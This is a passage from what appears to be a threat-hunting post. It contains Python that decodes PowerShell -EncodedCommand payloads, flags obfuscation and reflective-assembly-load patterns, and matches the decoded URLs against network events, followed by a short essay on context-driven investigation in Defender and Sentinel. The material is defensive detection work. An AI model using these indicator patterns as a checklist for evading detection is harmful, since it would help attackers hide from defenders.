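    "nested-base64": re.compile(r"FromBase64String", re.I),
    "string-obfuscation": re.compile(r"\[char\]|-join|`[a-z]|'\s*\+\s*'", re.I),
    "reflective-load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def extract_encoded(cmdline):
    """Return the base64 payload that follows an -EncodedCommand style switch, or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok and tok[0] in "-/" and tok[1:].lower() in ENCODED_FLAGS:
            return tokens[i + 1]
    return None


def decode_encoded(payload):
    """PowerShell encodes the script as UTF-16LE before base64; re-pad defensively."""
    raw = base64.b64decode(payload + "=" * (-len(payload) % 4))
    return raw.decode("utf-16-le")


def analyse_process(proc, net_events=()):
    """Decode the command, list indicators and URLs, and match those URLs'
    hosts against network events from the same device and process id."""
    payload = extract_encoded(proc["ProcessCommandLine"])
    if payload is None:
        return {"decoded": None, "indicators": [], "urls": [], "talked_out": []}
    script = decode_encoded(payload)
    urls = URL_RE.findall(script)
    hosts = {u.split("/")[2].split(":")[0].lower() for u in urls}
    talked_out = [n for n in net_events
                  if n["DeviceName"] == proc["DeviceName"]
                  and n["InitiatingProcessId"] == proc["ProcessId"]
                  and (n["RemoteIP"] in hosts or n.get("RemoteUrl", "").lower() in hosts)]
    return {
        "decoded": script,
        "indicators": sorted(name for name, rx in INDICATORS.items() if rx.search(script)),
        "urls": urls,
        "talked_out": talked_out,
    }


if __name__ == "__main__":
    print(analyse_process(SAMPLE_PROCESS, SAMPLE_NETWORK))
```

The decoded script is what turns "informational" into a question worth asking; the network match is what turns the question into a chain.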
________________________________________
🧠 Final pivot: Identity
In Microsoft Sentinel + Microsoft Entra ID logs:
• Successful sign-in
• New/unusual location
• Within minutes of execution
________________________________________
👉 Now we have a chain:
Process → Network → Identity → Time correlation
Individually? Benign.
Together? 🚨 Suspicious.
No alert stitched this together.
No incident created.
No rule triggered.
________________________________________
💬 This is the gap
❌ Alert-driven security
✅ Context-driven investigation
Defender detects signals.
Sentinel gives visibility.
👉 But neither replaces:
• Investigation
• Curiosity
• Experience
________________________________________
🎯 The real question isn’t:
“Did I get an alert?”
It’s:
👉 Did I understand what it meant?
________________________________________
🕵️‍♂️ Agent Foskett Insight
“The alert wasn’t ignored…
it just wasn’t understood.”
________________________________________
